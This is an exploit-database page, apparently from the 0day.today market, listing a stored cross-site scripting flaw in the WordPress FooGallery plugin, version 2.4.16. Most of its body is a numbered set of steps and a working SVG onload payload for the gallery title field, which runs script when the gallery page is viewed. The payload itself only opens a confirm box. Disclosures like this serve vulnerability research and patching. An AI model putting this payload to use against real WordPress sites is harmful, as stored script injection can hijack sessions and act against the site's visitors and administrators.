[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress FooGallery 2.4.16 Cross Site Scripting Vulnerability

Author
tmrswrr
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39671
Category
web applications
Date add
02-07-2024
Platform
php
# Exploit Title: FooGallery version : 2.4.16 Stored XSS
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/foogallery/
# Version 2.4.16


### Steps to Execute the Payload:

1. **Click Add New Gallery**: [Add New Gallery](https://127.0.0.1/wp-admin/post-new.php?post_type=foogallery)
2. **Write Add Title your payload**: `"><sVg/onLy=1 onLoaD=confirm(1)//`
3. **Click Publish**, then click **Create Gallery Page**.
4. **Verify Execution**: You will see the payload executed in the usage field.

#  0day.today [2024-07-07]  #